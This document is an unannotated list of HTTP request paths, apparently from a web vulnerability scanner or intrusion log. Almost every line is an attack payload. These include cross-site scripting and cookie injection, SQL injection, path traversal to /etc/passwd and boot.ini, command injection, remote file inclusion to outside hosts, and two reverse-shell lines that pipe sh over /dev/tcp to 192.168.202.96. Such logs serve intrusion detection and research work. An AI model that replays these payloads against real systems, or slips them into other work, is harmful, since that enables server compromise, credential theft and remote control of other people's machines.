content=\"testpokn=7494\">\n/uwiyxrvhad.exe\n/d44uk9h2.kspx?<script>document.cookie=\"testmybc=2088;\"</script>\n/recordings/fxm.exe\n/examples/jsp/security/protected/j_security_check;jsessionid=5680ad1b9956cf0a8a9f08a20f983ee6.copy\n/cgi-bin/forum_2.php?msg=10&return=<script>foo</script>\n/scripts/misc.php?action=login\n/ywaxntrx.php?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/ny1b3qq4.fts?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n////////../../../../../../etc/passwd\n/d7ktpmcq.x?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/examples/servlets/servlet/sources/functions.php?root_path=/etc/passwd\\x00\n/o1zj4u9v.cgi?<meta http-equiv=set-cookie content=\"testabrn=6368\">\n/examples/jsp/error/kernel/loadkernel.php?installpath=/etc/passwd\\x00\n/seventeen's - boots camp/\n/javascript/log4j.exe\n/phprocketaddin/?page=../../../../../../../../../../boot.ini\n/twiki/bin/view/main/twikiusers?rev=865 `0<&44-;exec 44<>/dev/tcp/192.168.202.96/7131;sh <&44 >&44 2>&44`#\n/manager/ikonboard.cgi?act=st&f=1&t=1&hl=nessus&st='\n/examples/jsp/sessions/webadmin.php?show=/etc/passwd\n/scripts/index.php?option=weblinks&itemid=2&catid=-1 union select 0,1,2,526188729179,4,5,6,7,8,9,10,11--\n/javascript/document.save\n/main.php?logout=\"&rm q52615858&rem \n/fnwhrxyd.html?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/nmw0do67.dll?<script>cross_site_scripting.nasl</script>\n/examples/jsp/jsp2/jspx/ovlaunch.exe\n/javascript/servlet.exe\n/main.php?logout='\\x0asleep 11 #\n/phpmyadmin/documentation.html?phpmyadmin=../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd\n/merengue <no gold>/\n/help.php?q=\"ping\\xa0-w\\xa010000\\xa0-n\\xa01\\xa01.2.3.4|rem\\xa0\n/scripts/wxrdqnkjuwmu.php\n/scripts/login.php?user=\"><script>alert('pubcookie_xss.nasl');</script>\n/script/ident/disconnect.php?path_inc=http://192.168.202.118:8080/zz5thkvtmlgl?\n/help.php?q=\"&del\\x0cq17127645&rem\\x0c\n/scripts/modules/tinymce/content_css.php?templateid=-1/**/union/**/select/**/1331904462,1,1434187354--\n/t7tm4m0b.idc?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/manager/showcat.php?cat=1'\n/d5a5renl.htm?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/top.php?stuff=\"\\x0drm q93764844 #\n/scripts/admin/components/com_fm/fm.install.php?lm_absolute_path=../../../&install_dir=limbo_com_fm_php_shell.nasl-1332008331\n/news-script/\n/javascript/operations.exe\n/top.php?stuff=\"&ping\\x0c-w\\x0c7000\\x0c-n\\x0c1\\x0c4.3.2.1&rem\\x0c\n/fc9t54l7.pl?<script>document.cookie=\"testggad=2000;\"</script>\n/evb/check_url.php?url=pligg_url_sql_injection.nasl' union select 1331904454,1014388214 -- \n/main.php?logout=\"&rm\\x09q14643294&rem\\x09\n/uvazfs7p.cgi?<script>document.cookie=\"testwtbo=4831;\"</script>\nftp://ftp/*<apache_mod_proxy_ftp_glob_xss.nasl>\n/fpnpp5zg.kspx?<script>document.cookie=\"testyias=101;\"</script>\n/examples/jsp/cal/texis.exe/nessus\n/scripts/9pen4xzgztjn.shtml\n/qhvu0pdg.nsf?<script>document.cookie=\"testchuc=2100;\"</script>\n/subscriptionconfirm/\n/9kr0ih0v.x?<script>document.cookie=\"testzgnm=1183;\"</script>\n/r3le3om5.mscgi?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/x7pclv4s.asp?<script>document.cookie=\"testiulz=3709;\"</script>\n/fmnveedu.htm?<meta http-equiv=set-cookie content=\"testgfbr=7014\">\n/javascript/_res.exe\n/xlj7h65o.fts?<meta http-equiv=set-cookie content=\"testtbbe=856\">\n/help.php?q='\\x0ddel\\x09q57419215\\x09#\n/script/_conf/core/common-tpl-vars.php?confdir=http://192.168.202.118:8080/tzhfyzkbomspvm??\n/javascript/this.exe\n/templates/form_header.php?noticemsg=<script>javascript:alert(document.cookie)</script>\n/zabbix/frontends/php/locales.php?download=1&langto=1&extlang[\".system('/bin/echo+-en+\"\\0174\\0044\\0000\\0377\\0347\"+>>+/tmp/ftxarcvjda0;').\"]=1\n/script/template/index.php?main_page_directory=http://192.168.202.118:8080/moclyxlwqyfjnp?\n/phpmyadmin//.\\..\\.\\..\\.\\..\\.\\..\\.\\..\\.\\..\\.\\..\\.\\..\\windows/win.ini\n/cgi-bin/cgitest.exe\n/examples/servlets/servlet/sendtemp.pl?templ=../../../../../etc/passwd\n..\\\\..\\\\..\\..\\\\..\\..\\\\..\\..\\\\\\boot.ini\n/scripts/modules/tinymce/content_css.php?templateid=-1/**/union/**/select/**/1331919011,1,921952561--\n/p043snfr.dll?<script>cross_site_scripting.nasl</script>\n/client/vmware-viclient.exe\n/siteserver/knowledge/default.asp?ctr=\\\"><script>alert('vulnerable')</script>\n/scripts/evb/check_url.php?url=pligg_url_sql_injection.nasl' union select 1331904454,1014388214 -- \n/script/tick/test.php?path_to_code=http://192.168.202.118:8080/zz5thkvtmlgl?\n/cgi-bin/store/index.cgi?page=../../../../../../../../etc/passwd\n/recordings/awstatstotals.php?sort=\"].phpinfo().exit().$a[\"\n/help.php?q=\"del q11698793 #\n/r3le3om5.exe?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/<4429ea00/\n/9ko6m4c8.do?<script>document.cookie=\"testylik=3403;\"</script>\n/egaet53a.do?<script>cross_site_scripting.nasl</script>\n/javascript/array.exe\n/help.php?q=\"&del\\xa0q16679515&rem\\xa0\n/cacti/nph-mr.cgi?do=loginhelp&configlanguage=../../../../../../../etc/passwd\\x00\n/examples/jsp/error/apps/pbcs.dll/misc?url=../../../../../../../../../../../../boot.ini\n/phpmyadmin/webadmin.php?show=/etc/passwd\n/3hlysl2x.html?<meta http-equiv=set-cookie content=\"testgjbe=8505\">\n/en-us/account/contrib/forms/evaluation/c_formevaluation.class.php?fileroot=/etc/passwd\\x00\n/help.php?q=\"&del q86798622&rem \n/examples/jsp/error/index.php?cat_select=<script>foo</script>\n/apavxugx.aspx?<meta http-equiv=set-cookie content=\"testdnbh=5237\">\n/scripts/index.php?x=browse&category='union select '1','2','pixelpost_category_sql_injection.nasl','1331904457','5'--\n/newsarchive.php?path_to_script=http://192.168.202.118:8080/zz5thkvtmlgl??&cmd=ls\n/manager/zpanel.php?page=/etc/passwd\\x00\n/examples/jsp/jsp2/jspx/ustorekeeper.pl?command=goto&file=../../../../../../../../../../etc/passwd\n/javascript/.passwd.ep\n/en-us/ddoworrl.dll?<meta http-equiv=set-cookie content=\"testvlau=8517\">\n/sgdynamo.exe?htname=sgdynamo.exe\n/javascript/u.exe\n/main.php?stuff=\"|ping -w 8000 -n 1 1.2.3.4|rem \n/scripts/index.php?selskin=../inc/boxleft.inc\\x00&xposbox[l][]=/etc/passwd\\x00\n/cgi-shl/win-c-sample.exe\n/javascript/faculty.exe\n/d7ktpmcq.aspx?<script>cross_site_scripting.nasl</script>\n/scripts/index.php?gadget=glossary&action=viewterm&term=<script>alert('jaws_xss.nasl');</script>\n/javascript/.htaccess.sfish/.htaccess.aspx-->\">'>'\"<sfi000015v868621>\n/scripts/h3d1n9eaqxv3.asp\n/i686v90l.exe?<script>document.cookie=\"testfutf=1550;\"</script>\n/5o9zq43e.exe?<script>cross_site_scripting.nasl</script>\n/miz4r5hz.idc?<script>document.cookie=\"testviqu=1270;\"</script>\n/zmvq66jy.aspx?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/examples/jsp/jsp2/el/mlog.html?screen=/etc/passwd\n/main.php?stuff=&ver\\x0c>q42577666&rem\\x0c\n/help.php?q='\\x0duname\\x09>q85664498\\x09#\n/examples/jsp/cal/direct.php?rf=/etc/passwd\\x00\n/javascript/counters.exe\n/search/submit.php?config[\"sipssys\"]=http://192.168.202.118:8080/zz5thkvtmlgl?\n/en-us/esmozg5d.pl?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/main.php?stuff=\"|ping;-w;11000;-n;1;4.3.2.1|rem;\n/scripts/editor/filemanager/connectors/php/upload.php?command=fileupload&type=file&currentfolder=/fckeditor_currentfolder_file_upload-1332010431.php.\n/modif_infos.asp?n=/../../../../../../../../../etc/passwd\n/link-description/\n/pxagj7n7.php?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/examples/jsp/checkbox/myevent.php?myevent_path=/etc/passwd\\x00\n/examples/jsp/jsp2/el/index.php?selskin=../inc/boxleft.inc\\x00&xposbox[l][]=/etc/passwd\\x00\n/manager/sugarcrm/modules/users/login.php?theme=../../../../../../../etc/passwd\\x00\n/h5i6crm3.cgi?<meta http-equiv=set-cookie content=\"testlihk=7070\">\n/en-us/33y9gcqq.mscgi?<meta http-equiv=set-cookie content=\"testnvxc=4301\">\n/examples/jsp/error/showcat.php?cat=1'\n/u95h6ymu.html?<script>document.cookie=\"testkhwc=4028;\"</script>\n/scripts/login.aspx\n/..../..../..../..../..../..../..../..../..../..../..../..../etc/passwd\n/jujgxwav.do?<meta http-equiv=set-cookie content=\"testknim=9383\">\n/moodle/filter/tex/texed.php?formdata=foo&pathname=foo\"+||+echo+db+00+00+00+04+00+00+00+00+00+00+00+00+40+00+00+00+04+00+00+00+00+00+00+02+00++>>esbq\n/en-us/account/xaradodb/server.php?sql='adodb_sql_sql_injection.nasl\n/that's that/\n/phpmyadmin/javascript.php?abs_path=/etc/passwd\\x00\n/examples/jsp/colors/webdist.cgi?distloc=;id\n/cgi/htimage.exe/path/filename?2,2\n/main.php?stuff=\"&rm\\x09q71999354\\x09#\n/rbec2ohx.mscgi?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/forums/index.php?board=;action=login2&user=username&cookielength=120&passwrd=password<script>alert('vulnerable')</script>\n/edzaia0i.php3?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/javascript/high.exe\n/index.php?op=default&date=200607' union select 1,1990910236,1,1,1,1,1,1,1,1--&blogid=1\n/test.php?evalme=eval($_server[http_x_efjcfccjtkphmyk]);\n/h5i6crm3.idc?<meta http-equiv=set-cookie content=\"testlihk=7070\">\n/examples/jsp/num/phpnews/sendtofriend.php?mid='1'\n/cacti/ncbook.cgi?action=default&current=|cat /etc/passwd|&form_tid=996604045&prev=main.html&list_message_index=10\n/javascript/cnf.exe\n/cgi.cgi/query?mss=../config\n/examples/jsp/jsp2/jspx/evb/check_url.php?url=pligg_url_sql_injection.nasl' union select 1331904454,472430861 -- \n/en-us/odzk29aa.html?<meta http-equiv=set-cookie content=\"testtfvh=2141\">\n/e9rx3ya4.cfc?<script>cross_site_scripting.nasl</script>\n/cgi-sys/gwweb.exe?help=bad-request\n/en-us/hipkz026.html?<meta http-equiv=set-cookie content=\"testyrbs=2855\">\n/scripts/search/results.stm?indexname=>\"><script>foo</script>&style=fancy&spage=60&query=folder name\n/emailsubscriptionservice/\n/?<meta http-equiv=set-cookie content=\"testswjp=6010\">\n/de3v2dd9.kspx?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/scripts/spt--forumtopics.php?forumid=-9 union select null,null,null,1331904462,4,5\n/examples/jsp/jsp2/jspx/admin/admin.php?sid='\n/x7pclv4s.php3?<meta http-equiv=set-cookie content=\"testiulz=3709\">\n/cgi-win/webcart/webcart.cgi?change=yes&code=phold&config=mountain&nextpage=;cat /etc/passwd|\n/rtpdumpscript/\n/examples/servlets/servletmultihtml.pl?multi=/etc/passwd\\x00html\n/javascript/1996.exe\n/components/com_mospray/scripts/admin.php?basedir=http://cirt.net/rfiinc.txt??&cmd=id\n/tuwjta1w.php?<script>document.cookie=\"testpokn=7494;\"</script>\n/search.php?sess=your_session_id&lookfor=&lt;script&gt;alert(document.cookie)&lt;/script&gt;\n/examples/jsp/sessions/secure.php?cfgprogdir=/etc/passwd\\x00\n/top.php?stuff=;rm\\x09q62254247\\x09#\n/javascript/tapestry.exe\n/phpmyadmin/welcome.php?custom_welcome_page=/etc/passwd\\x00\n/jscript.php?my_ms[root]=http://192.168.202.96:8080/4dckqcc0acprbz??\n/order/login.php?svr_rootscript=http://192.168.202.118:8080/zz5thkvtmlgl?\n/t7tm4m0b.exe?<script>cross_site_scripting.nasl</script>\n/crystalimagehandler.aspx?dynamicimage=../../../../../../../../winnt/system.ini\n/82q7ywa8.do?<meta http-equiv=set-cookie content=\"testpwew=1315\">\n/kur'an-r0/\n/1r8cfrlf.aspx?<script>document.cookie=\"testydan=5106;\"</script>\n/nyvbv05h.nsf?<meta http-equiv=set-cookie content=\"testftxz=5980\">\n/examples/jsp/sessions/modules.php?mod=fm&file=../../../../../../../../../../etc/passwd\\x00&bn=fm_d1\n/examples/jsp/colors/sawmill6cl.exe?ho+{complete_version}\n/file_description/\n/snippetmaster/includes/vars.inc.php?_session[script_path]=http://192.168.202.96:8080/4dckqcc0acprbz??\n/5o9zq43e.cgi?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/a0imiuf1.cfc?<script>document.cookie=\"testxqrn=4654;\"</script>\n/en-us/n9xlumt5.nsf?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/examples/jsp/error/quickstore.cgi?nessus&template=../../../../../../../../../../etc/passwd\\x00html\n/g8nu2yy7.do?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/moodle/filter/tex/texed.php?formdata=foo&pathname=foo\"+||+echo+db+c0+31+db+89+45+f0+8b+46+3c+8b+44+06+78+01+f0+83+c0+18+8b+10+89+55+f4+89+f2++>>ctdn\n/main.php?logout=&ver\\x0c>q38243564&rem\\x0c\n/raanw4ia.cfm?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/cgi-bin/gotopage.cgi?4242+../../../../../../../../../../../../../etc/passwd\n/d5a5renl.htm?<script>cross_site_scripting.nasl</script>\n/cgi-local/ustorekeeper.pl?command=goto&file=../../../../../../../../../../etc/passwd\n/2000transcripts/\n/top.php?stuff=\"ping\\xa0-w\\xa09000\\xa0-n\\xa01\\xa04.3.2.1|rem\\xa0\n/ap58k3ci.dll?<script>cross_site_scripting.nasl</script>\n/help.php?q=&rm;q75765892&rem;\n/gvx7m5ti.jspa?<meta http-equiv=set-cookie content=\"testwldz=3506\">\n/main.php?logout=ver&rem;\n/scripts/xuicksry9grj.php\n/examples/jsp/checkbox/faq.php?action=&type=view&s=&id=-1' union select 0,337036838,0,0,0,0,0--\n/3hlysl2x.htm?<script>document.cookie=\"testgjbe=8505;\"</script>\n/javascript/engine.exe\n/examples/jsp/error/language.php?data_dir=/etc/passwd\\x00\n/h4bi26jd.cfm?<meta http-equiv=set-cookie content=\"testhrzx=1150\">\n/fpnpp5zg.jsp?<meta http-equiv=set-cookie content=\"testyias=101\">\n/scripts/index.php?gadget=../../../../../../etc/passwd\\x00&path=/etc\n/examples/servlets/servlet/admin/top.php?admindir=/etc/passwd\\x00\n/search.php?config[\"sipssys\"]=http://192.168.202.96:8080/4dckqcc0acprbz?\n/scriptingnewsinxml/\n/examples/jsp/error/plog-download.php?dl_type=album&checked[]=' union select 'plogger_checked_sql_injection.nasl',0,0,0,0,0,0,0,0,0,0,0,0,0,0 -- \n/raanw4ia.fts?<script>cross_site_scripting.nasl</script>\n/speedscript/\n/phpmyadmin/index.php?action=login&languages[nessus]=syscp_1211.nasl&language=nessus&langs[nessus][0][file]=/etc/passwd\n/zmvq66jy.cfm?<script>cross_site_scripting.nasl</script>\n/vmi8bb12.nsf?<meta http-equiv=set-cookie content=\"testlerc=2575\">\n/scripts/formmail.pl\n/modules.php?set_albumname=album01&id=aaw&op=modload&name=gallery&file=index&include=../../../../../../../../../etc/passwd\n/en-us/7o5qp766.cgi?<script>cross_site_scripting.nasl</script>\n/help.php?q='\\x0dsleep\\x097\\x09#\n/examples/jsp/num/module.php?module=osticket&file=../../../../../../../../../../../etc/passwd\n/fcgi-bin/view_item?html_file=../../../../../../../../../../etc/passwd\\x00\n/main.php?stuff=\"ping,-w,8000,-n,1,4.3.2.1|rem,\n/top.php?stuff=\"&rm q85387982 #\n/xlj7h65o.do?<meta http-equiv=set-cookie content=\"testtbbe=856\">\n/phpmyadmin/index.php?op=default&date=200607' union select 1,760917547,1,1,1,1,1,1,1,1--&blogid=1\n/manager/adlayer.php?layerstyle=../../../../../../../etc/passwd\\x00\n/transcript050506/\n/i7prbs22.x?<script>document.cookie=\"testjnre=7328;\"</script>\n/oie504mr.aspx?<meta http-equiv=set-cookie content=\"testtpby=7052\">\n/swisscom-xss/\n/<script>document.cookie=\"testjpdr=9205;\"</script>\n/examples/jsp/jsp2/el/plog-download.php?dl_type=album&checked[]=' union select 'plogger_checked_sql_injection.nasl',0,0,0,0,0,0,0,0,0,0,0,0,0,0 -- \n/main.php?logout=\"\\x0auname\\x09#\n/nuh3zirz.fts?<script>cross_site_scripting.nasl</script>\n/javascript/oa_html.exe\n/mv8wxfy9.asp?<meta http-equiv=set-cookie content=\"testrhbc=8184\">\n/manual/servlets/scripts/servlet1/servform.htm\n/javascript/advanced.exe\n/scripts/rvckwz6smkqf.cgi\n/javascript/pro.exe\n/examples/jsp/checkbox/wa.exe?debug-show-version\n/en-us/7o5qp766.jspa?<script>cross_site_scripting.nasl</script>\n/main.php?logout=&ver;>q42123677&rem;\n/help.php?q=\"\\x0arm\\x09q45619595\\x09#\n/scripts/namazu.cgi\n/scgi-bin/powerup/r.cgi?file=../../../../../../../../../../etc/passwd\n/examples/jsp/jsp2/jspx/googlesearch/googlesearch.php?app[path][lib]=/etc/passwd\\x00\n/awstatstotals.php?sort=\"].passthru('id').exit().$a[\"\n/top.php?stuff='\\x0asleep\\x0910\\x09#\n/phpmyadmin/phpmyadmin.css.php?collation_connection=utf8_general_ci&convcharset=utf-8&js_frame=right&lang=en-utf-8&nocache=3830415403&token='\"\n/0qhcnefz.x?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/examples/jsp/error/core/api.php?t_path_core=/etc/passwd\\x00\n/main.php?logout=\"del\\x0bq12574322&rem\\x0b\n/examples/jsp/colors/include/doc/get_image.php?lang=en&img=../../../../../../../../../../etc/passwd\n/techweb's rss feed/\n/scripts/index.php?id='union/**/select/**/0,0,1511087781,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0--\n/main.php?logout='\\x0adel q63177134 #\n/twiki/bin/view/main/twikiusers?rev=87518 `0<&152-;exec 152<>/dev/tcp/192.168.202.96/22811;sh <&152 >&152 2>&152`#\n/scripts/nslookup.cgi?query=localhost;id&type=any&ns=\n/insertorder.cfm?cfid=&cftoken=1'tst\n/scripts/phprint.php?module=vtiger_lang_crm_lfi.nasl&action=1331909220&lang_crm=../../../../../../../../../../../..//etc/passwd\\x00\n/news/include/createdb.php?langfile;=@rfiurl?langfile;=@rfiurl?\n/scripts/news.scr.php?globals[pth][classes]=http://192.168.202.118:8080/moclyxlwqyfjnp??\n/wps/wcm/webinterface/login/login.jsp?\"><script>alert(\"ibm_login_qs_xss.nasl-1331908876\")</script>\n//</p><body><script src=http://www.example.com/test?rnd=q27996612></script><p>\n/en-us/7o5qp766.x?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/help.php?q=\"rm\\x09q83132484&rem\\x09\n/scripts/base_local_rules.php?dir=<script>alert('base_local_rules_xss.nasl-1331909287')</script>\n/7dbjwpw6.kspx?<script>cross_site_scripting.nasl</script>\n/javascript/htpasswd.jpg\n/en-us/account/evb/check_url.php?url=pligg_url_sql_injection.nasl' union select 1331905213,113095511 -- \n/script/fckeditor/license.txt\n/0w155a7c.cgi?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/top.php?stuff=\"ping,-w,11000,-n,1,1.2.3.4|rem,\n/let's-dance/\n/scripts/event_view.php?eid=34 union select 1215611548\n/phpmyadmin/ncbook.cgi?action=default&current=|cat /etc/passwd|&form_tid=996604045&prev=main.html&list_message_index=10\n/iv5vkgam.idc?<script>document.cookie=\"testfosd=94;\"</script>\n/top.php?stuff=\";rm\\x09q95359991\\x09#\n/3j8echh0.do?<meta http-equiv=set-cookie content=\"testfuqi=4189\">\n/script-fu/\n/pbserver/..%u00255c..%u00255c/winnt/system32/cmd.exe?/c+dir+c:\\+/og\n/fcgi-bin/c32web.exe/getimage?imagename=customeremail.txt\\x00.pdf\n/ygkjkngd.html?<script>document.cookie=\"testnago=4518;\"</script>\n/ewc3rz1l.dll?<meta http-equiv=set-cookie content=\"testkgqo=204\">\n/<meta http-equiv=set-cookie content=\"testbyqe=7474\">\n/help.php?q=\"ping\\x0b-w\\x0b10000\\x0b-n\\x0b1\\x0b4.3.2.1|rem\\x0b\n/examples/jsp/checkbox/directory.php?dir=;cat /etc/passwd\n/s7qus4g3.kspx?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/examples/jsp/checkbox/cal_event.php?id=1' union select 1,2,'calendarix_id_sql_injection.nasl',4,5,6,7,8,9,10,11,12,13--\n/qb2xy9aw.jspa?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/nyjgaorz.aspx?<script>cross_site_scripting.nasl</script>\n/examples/jsp/error/index.php?user_langue=../../../../../../../../../../etc/passwd\n/main.php?frm_daynight=day&frm_passwd=&frm_referer=http%3a//192.168.26.202/&frm_user=q37639343&scr_height=&scr_width=\n/awstats/awstats.pl?migrate=|echo;/./tmp/yzicxmyifv0 > /dev/null &;echo|awstats558782.txt\n/bn857frh.do?<script>cross_site_scripting.nasl</script>\n/athenareg.php?pass= ;id\n/ao22ww7y.aspx?<meta http-equiv=set-cookie content=\"testqppc=8767\">\n/ygkjkngd.do?<script>document.cookie=\"testnago=4518;\"</script>\n/top.php?stuff='&del\\x09q47253924\\x09#\n/examples/jsp/colors/inc/exif.inc.php?exif_prog=(echo -n 'original_exif_prog_cmd_exec.nasl: ';id)||echo\n<script>document.cookie=\"testgjbe=8505;\"</script>\n/examples/jsp/colors/adodb/server.php?sql='adodb_sql_sql_injection.nasl\n/scripts/print.php?what=article&id='\n/help.php?q=\"|ping,-w,10000,-n,1,1.2.3.4|rem,\n/scripts/zdbyw3dn3gh2.pl\n/javascript/internet.exe\n/main.php?logout='rm\\x09q59958199\\x09#\n/en-us/account/crystalimagehandler.aspx?dynamicimage=../../../../../../../../winnt/system.ini\n/examples/jsp/error/shopexd.asp?catalogid='42\n/script_path/installation/index.php?mosconfig_absolute_path=http://cirt.net/rfiinc.txt??\n/cgi-local/gw5/gwweb.exe?help=bad-request\n/jnt3f86c.cfm?<meta http-equiv=set-cookie content=\"testcmax=9270\">\n/main.php?logout=;rm q17429254 #\n/examples/jsp/error/coin_includes/constants.php?_ccfg[_pkg_path_incl]=/etc/passwd\\x00\n/j4oqyvga.aspx?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/main.php?stuff=\"ping\\xa0-w\\xa07000\\xa0-n\\xa01\\xa04.3.2.1|rem\\xa0\n/5qnlm5z2.exe?<script>document.cookie=\"testsixi=8451;\"</script>\n/scripts/spt--forumtopics.php?forumid=-9 union select null,null,null,1332008335,4,5\n/o1zj4u9v.idc?<script>document.cookie=\"testabrn=6368;\"</script>\n/main.php?logout=\"del\\x09q51755129&rem\\x09\n/main.php?stuff=\"&ver\\x0b>q52976574&rem\\x0b\n/examples/jsp/cal/starnet/addons/slideshow_full.php?album_name='336230542\n/_vti_bin/..\\xc1\\x9c..\\xc1\\x9c..\\xc1\\x9c..\\xc1\\x9c..\\xc1\\x9c../winnt/system32/cmd.exe?/c+dir+c:\\+/og\n/admin/components/com_fm/fm.install.php?lm_absolute_path=../../../&install_dir=limbo_com_fm_php_shell.nasl-1332010411\n/esmozg5d.pl?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/code/inc_header.php?gtopnombre=\"><script>alert('wvs-xss-magic-string-411626083441');</script><test=\"\n/phpmyadmin/cwmail.exe\n/scriptingnews/\n/login/sm_login_screen.php?error=\\\"><script>alert('vulnerable')</script>\n/scripts/wa.cgi?debug-show-version\n/6n7aacgg.php3?<script>cross_site_scripting.nasl</script>\n/interface/login/login_frame.php?site=<!--#exec cmd=\"ls /\"-->\n/w4996nr0.cfm?<script>document.cookie=\"testttvs=7163;\"</script>\n/javascript/employees.exe\n/en-us/<meta http-equiv=set-cookie content=\"testvlau=8517\">\n/en-us/dda2qr7j.aspx?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/moodle/filter/tex/texed.php?formdata=foo&pathname=foo\";ls+-l;rm+/tmp/fppatbfqdp\"\n/0u75ldxq.dll?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/javascript/htpasswd.conf\n<meta http-equiv=set-cookie content=\"testbnli=1975\">\n/examples/servlets/servlet/cgiwrap/cgiwrap_error_page_handling_xss.nasl\n/phpmyadmin/mylog.html?screen=/etc/passwd\n/cgi-bin/commerce.cgi?page=../../../../../etc/passwd\\x00index.html\n/scripts/shop.plx/page=nessus838143127\n/zmvq66jy.jsp?<script>cross_site_scripting.nasl</script>\n/h5i6crm3.asp?<meta http-equiv=set-cookie content=\"testlihk=7070\">\nhttp://xxxxxxxxxxx.:80/<script>alert('vulnerable')</script>.thtml\n/j734qobz.php3?<script>cross_site_scripting.nasl</script>\n/cacti/commsrss.php?files[0]=../../../../../../../../../../../../etc/passwd\n/subscriptions.js\n/quagynka.x?<script>cross_site_scripting.nasl</script>\n/ollydbg_ollyscripts/\n/javascript/pm.exe\n/mailpasswd/\n/tegenscript/\n/mail.php?id='/**/union/**/select/**/1,2,1332010419,4--&blog=1\n/j4rdyhw8.do?<meta http-equiv=set-cookie content=\"testrluj=1420\">\n/eg2u8pbv.idc?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/imprimer.asp?no=/etc/passwd|44|80040e14|[microsoft][odbc_sql_server_driver][sql_server]line_1:_incorrect_syntax_near_&#039;/&#039;.\n/7u1pb2xi.html?<script>document.cookie=\"testlwwz=718;\"</script>\n/admin/doeditconfig.php?thispath=../includes&config[path]=http://192.168.202.96:8080/4dckqcc0acprbz?\n/en-us/dda2qr7j.do?<script>cross_site_scripting.nasl</script>\n/bn857frh.exe?<script>cross_site_scripting.nasl</script>\n/wps/wcm/webinterface/login/login.jsp?\"><script>alert(\"ibm_login_qs_xss.nasl-1331909177\")</script>\n/awstats/awstats.pl?migrate=|echo;/./tmp/xmefwyizyj0 > /dev/null &;echo|awstats852068.txt\n/mv8wxfy9.x?<meta http-equiv=set-cookie content=\"testrhbc=8184\">\n<script>document.cookie=\"testyglc=8988;\"</script>\n/javascript/.htpasswd.sfish/0000023456\n/manager/cgiip.exe/wservice=wsbroker1/webtools/oscommand.w\n/javascript/~mark.exe\n/fpnpp5zg.mscgi?<script>document.cookie=\"testyias=101;\"</script>\n/gvx7m5ti.fts?<meta http-equiv=set-cookie content=\"testwldz=3506\">\n/webcgi/nph-showlogs.pl?files=../../&filter=.*&linecnt=500&refresh=0&submit=go\n/scripts/lpzj75ztw9lb.html\n/scripts/app_and_readme/navigator/index.php?page=http://192.168.202.96:8080/frznctvhi0i5?\n/help.php?q=uname >q93421292 #\n/5qnlm5z2.php?<script>document.cookie=\"testsixi=8451;\"</script>\n/6n7aacgg.kspx?<script>cross_site_scripting.nasl</script>\n/nmw0do67.cfm?<script>cross_site_scripting.nasl</script>\n/bxnyrhmh.htm?<script>document.cookie=\"testmjct=1867;\"</script>\n/j4drbkil.mscgi?<script>cross_site_scripting.nasl</script>\n/help.php?q=\"|ping\\x0b-w\\x0b8000\\x0b-n\\x0b1\\x0b4.3.2.1|rem\\x0b\n/scripts/weigh_keywords.php?etcdir=http://192.168.202.118:8080/tzhfyzkbomspvm?\n/606wkcop.php3?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/examples/servlets/servlet/index2.cgi?frames=yes&board=demo&mode=current&threads=collapse&message=../../../../../../../../../../etc/passwd\\x00\n/bemarket/postscript/postscript.php?p_mode=http://192.168.202.118:8080/zz5thkvtmlgl?\n/webdav/phprun.php?cmd=c:\\wce.exe\n/javascript/document.do\n/cacti/login.php?lang=/../../../../../../../../../../../../etc/passwd\\x00\n/scripts/forum.php?id_article=1&id_forum=-1/**/union/**/select 289896836--\n/5qnlm5z2.aspx?<script>document.cookie=\"testsixi=8451;\"</script>\n/en-us/dda2qr7j.html?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/scripts/tomcat_proxy_directory_traversal.nasl1331904240\n/s7qus4g3.jsp?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/examples/jsp/colors/man-cgi?section=0&topic=ls;id\n/apavxugx.do?<script>document.cookie=\"testdnbh=5237;\"</script>\n/scripts/awstatstotals.php?sort=\"].phpinfo().exit().$a[\"\n/bn857frh.php?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/eg2u8pbv.cgi?<script>cross_site_scripting.nasl</script>\n/scripts?username=\"<script>foo</script\n/examples/jsp/num/cgi/tseekdir.cgi?location=/etc/passwd\\x00\n/9kr0ih0v.mscgi?<script>document.cookie=\"testzgnm=1183;\"</script>\n/help.php?q=\"&uname >q86369979 